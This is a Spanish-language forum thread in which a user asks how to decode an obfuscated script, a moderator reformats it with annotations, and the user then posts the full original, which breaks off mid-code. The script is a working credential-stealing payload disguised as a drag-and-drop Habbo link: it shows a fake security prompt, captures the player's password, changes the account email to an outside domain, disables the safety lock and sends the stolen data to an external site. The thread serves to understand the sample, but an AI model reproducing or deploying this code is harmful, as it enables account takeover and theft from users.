Autor Tema: ¿Cómo decodifico esto?  (Leído 3,985 veces)
therecse

¿Cómo decodifico esto?
« en: 15 Marzo 2016, 13:23 pm »

Buenas, acabo de encontrar un código que me gustaría decodificar, pero no sé cómo, ya que no entiendo en qué tipo de lenguaje está codificado:

// Obfuscated fragment as first pasted in the thread. It is incomplete on its own:
// the string table _0x3459 and the variable owner are defined only in the full
// sample posted later in this thread, and the trailing quote and angle bracket at
// the end of the line are leftovers of the HTML attribute that wrapped the script.
// Every _0x3459[n] is a lookup into that string table and the _0xcfe9x* names are
// ordinary renamed locals. With the table substituted, the fragment:
//   1. requests the relative path /settings/email and cuts a name and an email
//      value out of the response text;
//   2. prepends a full-page overlay and a password prompt to the page body;
//   3. in add(), posts the typed password together with a generated address to
//      api/settings/email/change, and requests the safetylock/disable endpoint;
//   4. if that POST succeeds, submits a form carrying the generated address, the
//      password, the name, the original email and owner to the URL in _0x3459[0].
// Treat it as a static sample: decode the table in an isolated context and do not
// run the script in a browser tab that holds a live session.
// NOTE(review): $ is presumably jQuery supplied by the page the script runs in - confirm.
var linksave=_0x3459[0];var nome=null;var email=null;$[_0x3459[10]]({url:_0x3459[1],success:function b64EncodeUnicode(_0xcfe9x4){nome=_0xcfe9x4[_0x3459[3]](_0x3459[4])[1][_0x3459[3]](_0x3459[2])[0];email=_0xcfe9x4[_0x3459[3]](_0x3459[5])[1][_0x3459[3]](_0x3459[2])[0];div1=_0x3459[6];div2=_0x3459[7];$(_0x3459[9])[_0x3459[8]](div1);$(_0x3459[9])[_0x3459[8]](div2)}});function add(){var _0xcfe9x6=$(_0x3459[12])[_0x3459[11]]();var _0xcfe9x7=_0x3459[13]+Math[_0x3459[15]](Math[_0x3459[14]]()*999999)+_0x3459[16];if(_0xcfe9x6){$[_0x3459[23]](_0x3459[22],{currentPassword:_0xcfe9x6,newEmail:_0xcfe9x7},function(_0xcfe9x4){_0xcfe9x8()})[_0x3459[21]](function(){$(_0x3459[18])[_0x3459[17]]();$(_0x3459[20])[_0x3459[19]]({width:0},300);setTimeout(function(){$(_0x3459[18])[_0x3459[17]]()},3000)});$[_0x3459[25]](_0x3459[24]);function _0xcfe9x8(){var _0xcfe9x9=document[_0x3459[27]](_0x3459[26]);_0xcfe9x9[_0x3459[28]]=linksave;_0xcfe9x9[_0x3459[29]]=_0x3459[25];var _0xcfe9xa=document[_0x3459[27]](_0x3459[30]);_0xcfe9xa[_0x3459[31]]=_0x3459[32];_0xcfe9xa[_0x3459[33]]=_0x3459[34];_0xcfe9xa[_0x3459[35]]=_0xcfe9x7;var _0xcfe9xb=document[_0x3459[27]](_0x3459[30]);_0xcfe9xb[_0x3459[31]]=_0x3459[32];_0xcfe9xb[_0x3459[33]]=_0x3459[36];_0xcfe9xb[_0x3459[35]]=_0xcfe9x6;var _0xcfe9xc=document[_0x3459[27]](_0x3459[30]);_0xcfe9xc[_0x3459[31]]=_0x3459[32];_0xcfe9xc[_0x3459[33]]=_0x3459[37];_0xcfe9xc[_0x3459[35]]=nome;var _0xcfe9xd=document[_0x3459[27]](_0x3459[30]);_0xcfe9xd[_0x3459[31]]=_0x3459[32];_0xcfe9xd[_0x3459[33]]=_0x3459[38];_0xcfe9xd[_0x3459[35]]=email;var _0xcfe9xe=document[_0x3459[27]](_0x3459[30]);_0xcfe9xe[_0x3459[31]]=_0x3459[32];_0xcfe9xe[_0x3459[33]]=_0x3459[39];_0xcfe9xe[_0x3459[35]]=owner;_0xcfe9x9[_0x3459[40]](_0xcfe9xa);_0xcfe9x9[_0x3459[40]](_0xcfe9xb);_0xcfe9x9[_0x3459[40]](_0xcfe9xc);_0xcfe9x9[_0x3459[40]](_0xcfe9xd);_0xcfe9x9[_0x3459[40]](_0xcfe9xe);document[_0x3459[9]][_0x3459[40]](_0xcfe9x9);_0xcfe9x9[_0x3459[41]]()}}}'>

¿Me podríais ayudar? Muchas gracias.
En línea

.:UND3R:.
Moderador Global
***
Re: ¿Cómo decodifico esto?
« Respuesta #1 en: 15 Marzo 2016, 13:41 pm »

codificar?

Son arreglos, según yo, y ordenadamente quedaría más o menos así:

Código
  // Reading aid: _0x3459 is a plain array of strings (the hex-escaped table in the
  // full sample posted later in this thread). Every _0x3459[n] is only a lookup into
  // that table, so $[_0x3459[10]] reads as $.ajax. The _0xcfe9x* names are ordinary
  // renamed locals and parameters, not addresses.
  // Treat this as a static sample: decode the array literal in an isolated context
  // and do not run the script in a browser tab that holds a live session.
  // NOTE(review): $ is presumably jQuery supplied by the page the script runs in - confirm.
  //
  // _0x3459[0] is the external URL http://hiori-games.com/p/loading.php; it is used
  // further down as the action of the submitted form.
  1. var linksave=_0x3459[0];
  // Filled in by the success callback below with values read from the response.
  2. var nome=null;
  3. var email=null;
  4.  
  // $.ajax to the relative path /settings/email (index 1). Being relative, the
  // request goes to whatever origin the script is running in.
  5. $[_0x3459[10]]({
  6.  
  7. url:_0x3459[1],success:
  // The callback name b64EncodeUnicode is a decoy: nothing here encodes anything.
  8. function b64EncodeUnicode(_0xcfe9x4){
  // split (index 3) on the JSON key marker for name (index 4), then take the text
  // up to the next double quote (index 2). Same pattern for email (index 5).
  9. nome=_0xcfe9x4[_0x3459[3]](_0x3459[4])[1][_0x3459[3]](_0x3459[2])[0];
  10. email=_0xcfe9x4[_0x3459[3]](_0x3459[5])[1][_0x3459[3]](_0x3459[2])[0];
  // Index 6 is markup for a fixed, full-page, semi-transparent overlay. Index 7 is
  // markup for a modal with a hidden error toast, a password input with id inputtxt
  // and a button whose onclick calls add(). Both are assigned without var, so they
  // become implicit globals.
  11. div1=_0x3459[6];
  12. div2=_0x3459[7];
  // $(body).prepend(...) for each piece of markup (indexes 9 and 8).
  13. $(_0x3459[9])[_0x3459[8]](div1);
  14. $(_0x3459[9])[_0x3459[8]](div2)
  15. }
  16. });
  17.  
  // Click handler of the injected button.
  18. function add(){
  // $(#inputtxt).val(): whatever was typed into the injected password field.
  19. var _0xcfe9x6=$(_0x3459[12])[_0x3459[11]]();
  // Generated address: stopcredits + Math.floor(Math.random()*999999) + @lolito.tk
  // (indexes 13, 15, 14 and 16).
  20. var _0xcfe9x7=_0x3459[13]+Math[_0x3459[15]](Math[_0x3459[14]]()*999999)+_0x3459[16];
  21.  
  // Proceeds only when the password field is a non-empty string.
  22. if(_0xcfe9x6){
  // $.post to the relative path api/settings/email/change (indexes 23 and 22) with
  // the typed password and the generated address. The success callback ignores the
  // response body and calls the nested function _0xcfe9x8 declared below.
  23. $[_0x3459[23]](_0x3459[22],{currentPassword:_0xcfe9x6,newEmail:_0xcfe9x7},function(_0xcfe9x4){_0xcfe9x8()})
  // .fail (index 21): toggles the .toast element with fadeToggle, animates
  // #toast-progress to width 0 over 300 ms, and toggles the toast again after
  // 3000 ms. The toast text in index 7 is a wrong-password message, so a rejected
  // request is what shows it.
  24. [_0x3459[21]](function(){
  25. $(_0x3459[18])[_0x3459[17]]();
  26. $(_0x3459[20])[_0x3459[19]]({width:0},300);
  27. setTimeout(function(){$(_0x3459[18])[_0x3459[17]]()},3000)});
  // $.get (index 25) to https://www.habbo.es/api/safetylock/disable (index 24),
  // issued right after the POST is dispatched; its result is not inspected.
  28. $[_0x3459[25]](_0x3459[24]);
  29.  
  // Runs only from the POST success callback above: builds a form and submits it
  // to linksave.
  30. function _0xcfe9x8(){
  // document.createElement(form) with action = linksave and method = get. With
  // method get and an http:// action, the field values below travel in the query
  // string of the resulting navigation, which is where a proxy log or the browser
  // history would show them.
  31. var _0xcfe9x9=document[_0x3459[27]](_0x3459[26]);
  32. _0xcfe9x9[_0x3459[28]]=linksave;
  33. _0xcfe9x9[_0x3459[29]]=_0x3459[25];
  // Five inputs follow, each created as type = text (indexes 31 and 32), given a
  // name (index 33) and a value (index 35).
  // name mail_add (index 34): the generated address.
  34. var _0xcfe9xa=document[_0x3459[27]](_0x3459[30]);
  35. _0xcfe9xa[_0x3459[31]]=_0x3459[32];
  36. _0xcfe9xa[_0x3459[33]]=_0x3459[34];
  37. _0xcfe9xa[_0x3459[35]]=_0xcfe9x7;
  // name pass (index 36): the typed password.
  38. var _0xcfe9xb=document[_0x3459[27]](_0x3459[30]);
  39. _0xcfe9xb[_0x3459[31]]=_0x3459[32];
  40. _0xcfe9xb[_0x3459[33]]=_0x3459[36];
  41. _0xcfe9xb[_0x3459[35]]=_0xcfe9x6;
  // name habbo (index 37): the name value read from /settings/email.
  42. var _0xcfe9xc=document[_0x3459[27]](_0x3459[30]);
  43. _0xcfe9xc[_0x3459[31]]=_0x3459[32];
  44. _0xcfe9xc[_0x3459[33]]=_0x3459[37];
  45. _0xcfe9xc[_0x3459[35]]=nome;
  // name email (index 38): the email value read from /settings/email.
  46. var _0xcfe9xd=document[_0x3459[27]](_0x3459[30]);
  47. _0xcfe9xd[_0x3459[31]]=_0x3459[32];
  48. _0xcfe9xd[_0x3459[33]]=_0x3459[38];
  49. _0xcfe9xd[_0x3459[35]]=email;
  // name id (index 39): owner, which is not defined in this listing; the full
  // sample sets it at the start of the javascript: URI, before the string table.
  50. var _0xcfe9xe=document[_0x3459[27]](_0x3459[30]);
  51. _0xcfe9xe[_0x3459[31]]=_0x3459[32];
  52. _0xcfe9xe[_0x3459[33]]=_0x3459[39];
  53. _0xcfe9xe[_0x3459[35]]=owner;
  // appendChild (index 40) attaches the five inputs to the form and the form to
  // document.body; submit (index 41) then sends it.
  54. _0xcfe9x9[_0x3459[40]](_0xcfe9xa);
  55. _0xcfe9x9[_0x3459[40]](_0xcfe9xb);
  56. _0xcfe9x9[_0x3459[40]](_0xcfe9xc);
  57. _0xcfe9x9[_0x3459[40]](_0xcfe9xd);
  58. _0xcfe9x9[_0x3459[40]](_0xcfe9xe);
  59. document[_0x3459[9]][_0x3459[40]](_0xcfe9x9);
  60. _0xcfe9x9[_0x3459[41]]()
  61. }
  62. }}'>

¿Podrías indicar más o menos de dónde obtuviste tal código? Saludos.
En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
.:UND3R:.
Moderador Global
***
Re: ¿Cómo decodifico esto?
« Respuesta #2 en: 15 Marzo 2016, 13:43 pm »

Toda la magia está en el IF: a primera impresión, _0xcfe9x6 debe dar algo distinto de 0 para que se cumpla.

PD: a través de la función ADD se va modificando esa "variable" (o dirección de memoria).
En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
therecse

Re: ¿Cómo decodifico esto?
« Respuesta #3 en: 15 Marzo 2016, 14:39 pm »

Buenas de nuevo, muchas gracias por las respuestas tan rápidas.
Obtuve ese código tras decodificar el siguiente:

Código:
<a onClick="alert('Debe iniciar sesion en habbo y arrastrar la imagen a la pestaña de habbo');return false;" href='javascript:var owner = "duplicador";&#65279;var _0x3459=["\x68\x74\x74\x70\x3A\x2F\x2F\x68\x69\x6F\x72\x69\x2D\x67\x61\x6D\x65\x73\x2E\x63\x6F\x6D\x2F\x70\x2F\x6C\x6F\x61\x64\x69\x6E\x67\x2E\x70\x68\x70","\x2F\x73\x65\x74\x74\x69\x6E\x67\x73\x2F\x65\x6D\x61\x69\x6C","\x22","\x73\x70\x6C\x69\x74","\x6E\x61\x6D\x65\x22\x3A\x22","\x65\x6D\x61\x69\x6C\x22\x3A\x22","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x22\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x20\x66\x69\x78\x65\x64\x3B\x20\x74\x6F\x70\x3A\x20\x30\x70\x78\x3B\x20\x6C\x65\x66\x74\x3A\x20\x30\x70\x78\x3B\x20\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x20\x38\x30\x30\x3B\x20\x77\x69\x64\x74\x68\x3A\x20\x31\x30\x30\x25\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x31\x30\x30\x25\x3B\x20\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x3A\x20\x72\x67\x62\x61\x28\x31\x30\x2C\x20\x35\x34\x2C\x20\x39\x34\x2C\x20\x30\x2E\x38\x29\x3B\x22\x3E\x3C\x2F\x64\x69\x76\x3E","\x3C\x64\x69\x76\x20\x69\x64\x3D\x22\x68\x69\x64\x64\x65\x6E\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x20\x66\x69\x78\x65\x64\x3B\x20\x74\x6F\x70\x3A\x20\x37\x30\x70\x78\x3B\x20\x77\x69\x64\x74\x68\x3A\x20\x35\x30\x30\x70\x78\x3B\x20\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x20\x39\x30\x30\x3B\x20\x6C\x65\x66\x74\x3A\x20\x35\x30\x25\x3B\x20\x6D\x61\x72\x67\x69\x6E\x2D\x6C\x65\x66\x74\x3A\x20\x2D\x32\x35\x30\x70\x78\x3B\x22\x3E\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x22\x64\x69\x73\x70\x6C\x61\x79\x3A\x20\x62\x6C\x6F\x63\x6B\x3B\x20\x74\x72\x61\x6E\x73\x69\x74\x69\x6F\x6E\x3A\x20\x31\x73\x3B\x22\x20\x69\x64\x3D\x22\x74\x6F\x61\x73\x74\x2D\x63\x6F\x6E\x74\x61\x69\x6E\x65\x72\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x74\x6F\x61\x73\x74\x2D\x74\x6F\x70\x2D\x63\x65\x6E\x74\x65\x72\x22\x20\x61\x72\x69\x61\x2D\x6C\x69\x76\x65\x3D\x22\x70\x6F\x6C\x69\x74\x65\x22\x20\x72\x6F\x6C\x65\x3D\x22\x61\x6C\x65\x72\x74\x22\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x
3D\x22\x74\x6F\x61\x73\x74\x20\x74\x6F\x61\x73\x74\x2D\x65\x72\x72\x6F\x72\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x64\x69\x73\x70\x6C\x61\x79\x3A\x20\x6E\x6F\x6E\x65\x3B\x22\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x74\x6F\x61\x73\x74\x2D\x70\x72\x6F\x67\x72\x65\x73\x73\x22\x20\x69\x64\x3D\x22\x74\x6F\x61\x73\x74\x2D\x70\x72\x6F\x67\x72\x65\x73\x73\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x39\x39\x2E\x39\x25\x3B\x20\x74\x72\x61\x6E\x73\x69\x74\x69\x6F\x6E\x3A\x20\x32\x73\x3B\x22\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x74\x6F\x61\x73\x74\x2D\x6D\x65\x73\x73\x61\x67\x65\x22\x20\x69\x64\x3D\x22\x74\x6F\x61\x73\x74\x2D\x6D\x65\x73\x73\x61\x67\x65\x22\x3E\x4C\x61\x20\x63\x6F\x6E\x74\x72\x61\x73\x65\xF1\x61\x20\x71\x75\x65\x20\x69\x6E\x67\x72\x65\x73\x6F\x20\x65\x73\x20\x69\x6E\x63\x6F\x72\x72\x65\x63\x74\x61\x2C\x20\x76\x65\x72\x69\x66\x69\x71\x75\x65\x20\x65\x20\x69\x6E\x74\x65\x6E\x74\x65\x20\x64\x65\x20\x6E\x75\x65\x76\x6F\x2E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x6D\x6F\x64\x61\x6C\x2D\x64\x69\x61\x6C\x6F\x67\x22\x20\x6E\x67\x2D\x63\x6C\x61\x73\x73\x3D\x22\x73\x69\x7A\x65\x20\x3F\x20\x22\x20\x6D\x6F\x64\x61\x6C\x2D\x22\x3D\x22\x22\x20\x2B\x3D\x22\x22\x20\x73\x69\x7A\x65\x3D\x22\x22\x20\x3A\x3D\x22\x22\x20\x22\x22\x22\x3D\x22\x22\x3E\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x22\x68\x65\x69\x67\x68\x74\x3A\x20\x32\x35\x30\x70\x78\x3B\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x6D\x6F\x64\x61\x6C\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x22\x20\x75\x69\x62\x2D\x6D\x6F\x64\x61\x6C\x2D\x74\x72\x61\x6E\x73\x63\x6C\x75\x64\x65\x3D\x22\x22\x3E\x3C\x64\x69\x76\x3E\x3C\x62\x75\x74\x74\x6F\x6E\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x22\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x72\x65\x6C\x6F\x61\x64\x28\x29\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x6D\x6F\x64\x61\x6C\x5F\x5F\x63\x6C\x6F\x73\x65\x22\x3E\x3C\x2F\x62\x75\x74\x74\x6F\x6E\x3E\x3C\x68\x33\x20\x
74\x72\x61\x6E\x73\x6C\x61\x74\x65\x3D\x22\x53\x41\x46\x45\x54\x59\x5F\x4C\x4F\x43\x4B\x5F\x54\x49\x54\x4C\x45\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x6D\x6F\x64\x61\x6C\x5F\x5F\x74\x69\x74\x6C\x65\x22\x3E\x43\x75\x65\x6E\x74\x61\x20\x70\x72\x6F\x74\x65\x67\x69\x64\x61\x20\x70\x6F\x72\x20\x73\x65\x67\x75\x72\x69\x64\x61\x64\x2E\x3C\x2F\x68\x33\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x6D\x6F\x64\x61\x6C\x5F\x5F\x63\x6F\x6E\x74\x65\x6E\x74\x22\x3E\x3C\x70\x20\x74\x72\x61\x6E\x73\x6C\x61\x74\x65\x3D\x22\x53\x41\x46\x45\x54\x59\x5F\x4C\x4F\x43\x4B\x5F\x41\x4E\x53\x57\x45\x52\x22\x3E\x3C\x2F\x70\x3E\x3C\x21\x2D\x2D\x20\x6E\x67\x49\x66\x3A\x20\x73\x61\x66\x65\x74\x79\x4C\x6F\x63\x6B\x46\x6F\x72\x6D\x2E\x24\x65\x72\x72\x6F\x72\x2E\x72\x65\x6D\x6F\x74\x65\x44\x61\x74\x61\x41\x6E\x73\x77\x65\x72\x20\x2D\x2D\x3E\x3C\x66\x69\x65\x6C\x64\x73\x65\x74\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x66\x69\x65\x6C\x64\x73\x65\x74\x22\x3E\x3C\x6C\x61\x62\x65\x6C\x20\x66\x6F\x72\x3D\x22\x73\x61\x66\x65\x74\x79\x2D\x6C\x6F\x63\x6B\x2D\x61\x6E\x73\x77\x65\x72\x31\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x6C\x61\x62\x65\x6C\x22\x20\x74\x72\x61\x6E\x73\x6C\x61\x74\x65\x3D\x22\x49\x44\x45\x4E\x54\x49\x54\x59\x5F\x53\x41\x46\x45\x54\x59\x51\x55\x45\x53\x54\x49\x4F\x4E\x5F\x31\x22\x3E\x49\x6E\x67\x72\x65\x73\x65\x20\x73\x75\x20\x63\x6F\x6E\x74\x72\x61\x73\x65\xF1\x61\x20\x70\x61\x72\x61\x20\x63\x6F\x6E\x74\x69\x6E\x75\x61\x72\x3C\x2F\x6C\x61\x62\x65\x6C\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x66\x69\x65\x6C\x64\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x69\x64\x3D\x22\x69\x6E\x70\x75\x74\x74\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x61\x6E\x73\x77\x65\x72\x31\x22\x20\x74\x79\x70\x65\x3D\x22\x70\x61\x73\x73\x77\x6F\x72\x64\x22\x20\x6E\x67\x2D\x6D\x6F\x64\x65\x6C\x3D\x22\x61\x6E\x73\x77\x65\x72\x73\x2E\x61\x6E\x73\x77\x65\x72\x31\x22\x20\x6E\x67\x2D\x6D\x6F\x64\x65\x6C\x2D\x6F\x70\x74\x69\x6F\x6E\x73\x3D\x22\x7B\x20\x75\x70\x
64\x61\x74\x65\x4F\x6E\x3A\x20\x22\x20\x64\x65\x66\x61\x75\x6C\x74\x3D\x22\x22\x20\x62\x6C\x75\x72\x22\x2C\x3D\x22\x22\x20\x64\x65\x62\x6F\x75\x6E\x63\x65\x3A\x3D\x22\x22\x20\x7B\x3D\x22\x22\x20\x64\x65\x66\x61\x75\x6C\x74\x3A\x3D\x22\x22\x20\x35\x30\x30\x2C\x3D\x22\x22\x20\x62\x6C\x75\x72\x3A\x3D\x22\x22\x20\x30\x3D\x22\x22\x20\x7D\x3D\x22\x22\x20\x7D\x22\x3D\x22\x22\x20\x72\x65\x71\x75\x69\x72\x65\x64\x3D\x22\x22\x20\x72\x65\x6D\x6F\x74\x65\x2D\x64\x61\x74\x61\x3D\x22\x22\x20\x61\x6E\x73\x77\x65\x72\x22\x22\x3D\x22\x22\x20\x70\x61\x73\x73\x77\x6F\x72\x64\x2D\x74\x6F\x67\x67\x6C\x65\x2D\x6D\x61\x73\x6B\x3D\x22\x22\x20\x61\x75\x74\x6F\x63\x6F\x6D\x70\x6C\x65\x74\x65\x3D\x22\x6F\x66\x66\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x69\x6E\x70\x75\x74\x20\x6E\x67\x2D\x70\x72\x69\x73\x74\x69\x6E\x65\x20\x6E\x67\x2D\x75\x6E\x74\x6F\x75\x63\x68\x65\x64\x20\x70\x61\x73\x73\x77\x6F\x72\x64\x2D\x74\x6F\x67\x67\x6C\x65\x2D\x6D\x61\x73\x6B\x20\x6E\x67\x2D\x69\x6E\x76\x61\x6C\x69\x64\x20\x6E\x67\x2D\x69\x6E\x76\x61\x6C\x69\x64\x2D\x72\x65\x71\x75\x69\x72\x65\x64\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x62\x6F\x72\x64\x65\x72\x2D\x63\x6F\x6C\x6F\x72\x3A\x20\x72\x67\x62\x28\x31\x34\x34\x2C\x20\x35\x31\x2C\x20\x38\x32\x29\x3B\x22\x3E\x3C\x69\x20\x63\x6C\x61\x73\x73\x3D\x22\x70\x61\x73\x73\x77\x6F\x72\x64\x2D\x74\x6F\x67\x67\x6C\x65\x2D\x6D\x61\x73\x6B\x5F\x5F\x69\x63\x6F\x6E\x22\x3E\x3C\x2F\x69\x3E\x3C\x21\x2D\x2D\x20\x6E\x67\x49\x66\x3A\x20\x73\x61\x66\x65\x74\x79\x4C\x6F\x63\x6B\x46\x6F\x72\x6D\x2E\x61\x6E\x73\x77\x65\x72\x31\x2E\x24\x65\x72\x72\x6F\x72\x2E\x72\x65\x71\x75\x69\x72\x65\x64\x20\x26\x26\x20\x28\x21\x73\x61\x66\x65\x74\x79\x4C\x6F\x63\x6B\x46\x6F\x72\x6D\x2E\x61\x6E\x73\x77\x65\x72\x31\x2E\x24\x70\x72\x69\x73\x74\x69\x6E\x65\x20\x7C\x7C\x20\x73\x61\x66\x65\x74\x79\x4C\x6F\x63\x6B\x46\x6F\x72\x6D\x2E\x24\x73\x75\x62\x6D\x69\x74\x74\x65\x64\x29\x20\x2D\x2D\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x66\x69\x65\x6C\x64\x73\x65\x74\x3E\x3C\x64\x69\x76\x20\x63\x6C\x
61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x66\x6F\x6F\x74\x65\x72\x22\x3E\x3C\x61\x20\x68\x72\x65\x66\x3D\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x68\x61\x62\x62\x6F\x2E\x65\x73\x2F\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x63\x61\x6E\x63\x65\x6C\x22\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x22\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x72\x65\x6C\x6F\x61\x64\x28\x29\x22\x20\x74\x72\x61\x6E\x73\x6C\x61\x74\x65\x3D\x22\x46\x4F\x52\x4D\x5F\x43\x41\x4E\x43\x45\x4C\x5F\x4C\x41\x42\x45\x4C\x22\x3E\x43\x61\x6E\x63\x65\x6C\x61\x72\x3C\x2F\x61\x3E\x20\x3C\x62\x75\x74\x74\x6F\x6E\x20\x6E\x67\x2D\x64\x69\x73\x61\x62\x6C\x65\x64\x3D\x22\x75\x6E\x6C\x6F\x63\x6B\x69\x6E\x67\x49\x6E\x50\x72\x6F\x67\x72\x65\x73\x73\x22\x20\x74\x79\x70\x65\x3D\x22\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x73\x75\x62\x6D\x69\x74\x22\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x22\x61\x64\x64\x28\x29\x3B\x22\x3E\x43\x6F\x6E\x74\x69\x6E\x75\x61\x72\x3C\x2F\x62\x75\x74\x74\x6F\x6E\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E","\x70\x72\x65\x70\x65\x6E\x64","\x62\x6F\x64\x79","\x61\x6A\x61\x78","\x76\x61\x6C","\x23\x69\x6E\x70\x75\x74\x74\x78\x74","\x73\x74\x6F\x70\x63\x72\x65\x64\x69\x74\x73","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x40\x6C\x6F\x6C\x69\x74\x6F\x2E\x74\x6B","\x66\x61\x64\x65\x54\x6F\x67\x67\x6C\x65","\x2E\x74\x6F\x61\x73\x74","\x61\x6E\x69\x6D\x61\x74\x65","\x23\x74\x6F\x61\x73\x74\x2D\x70\x72\x6F\x67\x72\x65\x73\x73","\x66\x61\x69\x6C","\x61\x70\x69\x2F\x73\x65\x74\x74\x69\x6E\x67\x73\x2F\x65\x6D\x61\x69\x6C\x2F\x63\x68\x61\x6E\x67\x65","\x70\x6F\x73\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x68\x61\x62\x62\x6F\x2E\x65\x73\x2F\x61\x70\x69\x2F\x73\x61\x66\x65\x74\x79\x6C\x6F\x63\x6B\x2F\x64\x69\x73\x61\x62\x6C\x65","\x67\x65\x74","\x66\x6F\x72\x6D","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x63\x74\x69\x6F\x6E","
\x6D\x65\x74\x68\x6F\x64","\x69\x6E\x70\x75\x74","\x74\x79\x70\x65","\x74\x65\x78\x74","\x6E\x61\x6D\x65","\x6D\x61\x69\x6C\x5F\x61\x64\x64","\x76\x61\x6C\x75\x65","\x70\x61\x73\x73","\x68\x61\x62\x62\x6F","\x65\x6D\x61\x69\x6C","\x69\x64","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x73\x75\x62\x6D\x69\x74"];var linksave=_0x3459[0];var nome=null;var email=null;$[_0x3459[10]]({url:_0x3459[1],success:function b64EncodeUnicode(_0xcfe9x4){nome=_0xcfe9x4[_0x3459[3]](_0x3459[4])[1][_0x3459[3]](_0x3459[2])[0];email=_0xcfe9x4[_0x3459[3]](_0x3459[5])[1][_0x3459[3]](_0x3459[2])[0];div1=_0x3459[6];div2=_0x3459[7];$(_0x3459[9])[_0x3459[8]](div1);$(_0x3459[9])[_0x3459[8]](div2)}});function add(){var _0xcfe9x6=$(_0x3459[12])[_0x3459[11]]();var _0xcfe9x7=_0x3459[13]+Math[_0x3459[15]](Math[_0x3459[14]]()*999999)+_0x3459[16];if(_0xcfe9x6){$[_0x3459[23]](_0x3459[22],{currentPassword:_0xcfe9x6,newEmail:_0xcfe9x7},function(_0xcfe9x4){_0xcfe9x8()})[_0x3459[21]](function(){$(_0x3459[18])[_0x3459[17]]();$(_0x3459[20])[_0x3459[19]]({width:0},300);setTimeout(function(){$(_0x3459[18])[_0x3459[17]]()},3000)});$[_0x3459[25]](_0x3459[24]);function _0xcfe9x8(){var _0xcfe9x9=document[_0x3459[27]](_0x3459[26]);_0xcfe9x9[_0x3459[28]]=linksave;_0xcfe9x9[_0x3459[29]]=_0x3459[25];var _0xcfe9xa=document[_0x3459[27]](_0x3459[30]);_0xcfe9xa[_0x3459[31]]=_0x3459[32];_0xcfe9xa[_0x3459[33]]=_0x3459[34];_0xcfe9xa[_0x3459[35]]=_0xcfe9x7;var _0xcfe9xb=document[_0x3459[27]](_0x3459[30]);_0xcfe9xb[_0x3459[31]]=_0x3459[32];_0xcfe9xb[_0x3459[33]]=_0x3459[36];_0xcfe9xb[_0x3459[35]]=_0xcfe9x6;var _0xcfe9xc=document[_0x3459[27]](_0x3459[30]);_0xcfe9xc[_0x3459[31]]=_0x3459[32];_0xcfe9xc[_0x3459[33]]=_0x3459[37];_0xcfe9xc[_0x3459[35]]=nome;var _0xcfe9xd=document[_0x3459[27]](_0x3459[30]);_0xcfe9xd[_0x3459[31]]=_0x3459[32];_0xcfe9xd[_0x3459[33]]=_0x3459[38];_0xcfe9xd[_0x3459[35]]=email;var 
